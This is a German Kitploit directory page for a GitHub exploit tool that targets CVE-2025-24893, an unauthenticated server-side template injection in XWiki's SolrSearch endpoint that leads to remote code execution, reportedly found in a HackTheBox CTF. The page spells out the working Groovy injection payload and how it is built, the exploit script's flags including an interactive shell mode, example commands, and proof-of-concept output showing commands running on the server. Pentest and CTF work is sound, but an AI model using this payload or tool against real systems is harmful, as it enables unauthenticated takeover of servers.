Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24893-XWiki-SSTI-RCE — CVE-2025-24893 – XWiki SSTI nicht authentifizierter RCE-Exploit (HackTheBox CTF) | Kitploit
Tools/GitHubGitHub/rippsec/cve-2025-24893-xwiki-ssti-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstests
GitHubrippsec/cve-2025-24893-xwiki-ssti-rce

CVE-2025-24893-XWiki-SSTI-RCE

CVE-2025-24893 – XWiki SSTI nicht authentifizierter RCE-Exploit (HackTheBox CTF)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
2vor 4 MonatenNoch nicht geprüft
Teilen

CVE-2025-24893 — XWiki SSTI Remote-Code-Ausführung

Übersicht

FeldEinzelheiten
CVECVE-2025-24893
SoftwareXWiki
SicherheitslückeServerseitige Template-Injection (SSTI) → RCE
AuthentifizierungNicht erforderlich
CVSS-WertKritisch
KontextEntdeckt während eines HackTheBox CTF

Beschreibung

XWiki stellt einen SolrSearch-Endpunkt (/xwiki/bin/get/Main/SolrSearch) bereit, der benutzereingegebene Daten ohne Bereinigung durch die Groovy-Template-Engine rendert. Ein nicht authentifizierter Angreifer kann einen Groovy-Ausdruck über den text-Query-Parameter injizieren und so eine Remote-Code-Ausführung auf dem zugrunde liegenden Server erreichen.

Technische Details

Verwundbarer Endpunkt

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=<PAYLOAD>

Injektionsmechanismus

Der text-Parameter wird direkt in einen XWiki-Makro-Kontext eingebettet und von der Groovy-Engine ausgewertet. Die Injektion verlässt den Template-Kontext mit }}} und öffnet einen {{async}}{{groovy}}-Block:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}

Die Ausgabe wird im RSS-Antworttext reflektiert und kann per Regex extrahiert werden.

Payload-Struktur

root@kitploit:~
payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'

Die Antwort ist XML/RSS – die Befehlsausgabe erscheint zwischen [}}}- und ]</-Markierungen mit HTML-kodierten Zeichen.

Verwendung

root@kitploit:~
python3 exploit.py -t <TARGET> [-p PORT] [-s] [-i | -c COMMAND]
FlaggeBeschreibung
-tZiel-Hostname oder IP
-pPort (Standard: 80)
-sHTTPS verwenden
-iInteraktiver Shell-Modus
-cEinzelbefehlsausführung
-vAusführliche Ausgabe

Beispiele

root@kitploit:~
# Einzelbefehl
python3 exploit.py -t wiki.target.htb -c "id"

# Interaktive Shell
python3 exploit.py -t wiki.target.htb -i

# HTTPS auf benutzerdefiniertem Port
python3 exploit.py -t wiki.target.htb -p 443 -s -i

Abhängigkeiten

root@kitploit:~
pip install requests termcolor

Konzeptnachweis

root@kitploit:~
$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Referenzen

  • XWiki Offizielles Advisory
  • NVD-Eintrag
Tool herunterladen